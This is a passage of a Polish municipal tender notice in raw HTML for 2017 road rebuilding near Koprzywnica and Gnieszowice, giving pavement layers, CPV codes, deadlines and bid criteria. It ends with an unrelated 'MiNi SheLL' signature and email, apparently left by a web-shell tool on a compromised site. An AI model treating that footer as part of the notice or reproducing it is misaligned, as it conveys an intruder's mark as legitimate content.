Następnie wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża przy użyciu równiarki samojezdnej i walca wibracyjnego. Podbudowa zasadnicza z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości projektowanego remontowanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 w ilości średnio 100 kg/m2, a następnie warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 7 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej i grysów kamiennych.
Konstrukcja nawierzchni jezdni :
- 3 cm  warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1
- 4 cm (średnio 100 kg/m2)  warstwa wiążąca z betonu asfaltowego AC11W dla  ruchu KR1
- 20 cm   podbudowa zasadnicza z kruszywa łamanego 0/63 mm
Konstrukcja nawierzchni poboczy :
-   podwójne powierzchniowe utrwalenie nawierzchni grysami kamiennymi i emulsją asfaltową 
-   średnio 7 cm  nawierzchnia poboczy z kruszywa łamanego niesortowanego 0/31,5 mm
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45113000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Wydłużony okres udzielonej gwarancji jakości  </td><td>20</td></tr><tr><td>Zwiększenie grubości warstwy ścieralnej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Przebudowa drogi gminnej dz. nr 435 obręb Gnieszowice, Gnieszowice-Koprzywnica od km 0+286 do km 0+750, celem zabezpieczenia dna wąwozu lessowego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot niniejszego zadania obejmuje wykonanie przebudowy drogi na odcinku długości 464 mb. Istniejąca droga na odcinku od km 0+000 do km 0+286 posiada nawierzchnię asfaltową, w km 0+286 do km 0+750 przebiega przez wąwóz lessowy.
Istniejącą drogę należy na całym odcinku wzmocnić do wymaganych parametrów technicznych. Dlatego konieczne jest wykonanie mechanicznego poszerzenia wąwozu wraz z plantowaniem skarp.  
Następnie przy użyciu równiarki samojezdnej i walca wibracyjnego  wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża. Podbudowa z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości przebudowywanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 w ilości średnio 100 kg/m2, a następnie warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 7 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej i grysów kamiennych.
Skarpy wąwozu należy lokalnie wzmocnić poprzez ułożenie płyt ażurowych betonowych prefabrykowanych typu MEBA o wymiarach 60x40x8 cm, wysokość umocnienia skarp zależy dostosować w zależności od warunków terenowych.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45113000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Wydłużony okres udzielonej gwarancji jakości  </td><td>20</td></tr><tr><td>Zwiększenie grubości warstwy ścieralnej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Remont drogi gminnej dz. nr 3808 obręb Koprzywnica, Koprzywnica (wąwóz)  Kolonia Gnieszowice od km 0+000 do km 0+500, celem zabezpieczenia dna wąwozu lessowego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Niniejsze zadanie obejmuje wykonanie remontu drogi na odcinku długości 500 mb. Istniejąca droga na całym odcinku posiada nawierzchnię gruntową nieulepszoną, w km 0+017 do km 0+267 przebiega przez wąwóz lessowy.
Istniejącą drogę należy na całym odcinku wzmocnić do  wymaganych parametrów technicznych. Dlatego konieczne jest wykonanie mechanicznego poszerzenia wąwozu wraz z plantowaniem skarp.  
Następnie przy użyciu równiarki samojezdnej i walca wibracyjnego  wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża. 
Dolna warstwa podbudowy z kruszywa naturalnego np. rumoszu skalnego lub pospółki o grub. w-wy 20 cm. Podbudowa zasadnicza z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości remontowanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 w ilości średnio 100 kg/m2, a następnie warstwa ścieralna z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 7 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej i grysów kamiennych.
Skarpy wąwozu należy lokalnie wzmocnić poprzez ułożenie płyt ażurowych betonowych prefabrykowanych typu MEBA o wymiarach 60x40x8 cm, wysokość umocnienia skarp zależy dostosować w zależności od warunków terenowych
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45113000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Wydłużony okres udzielonej gwarancji jakości  </td><td>20</td></tr><tr><td>Zwiększenie grubości warstwy ścieralnej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com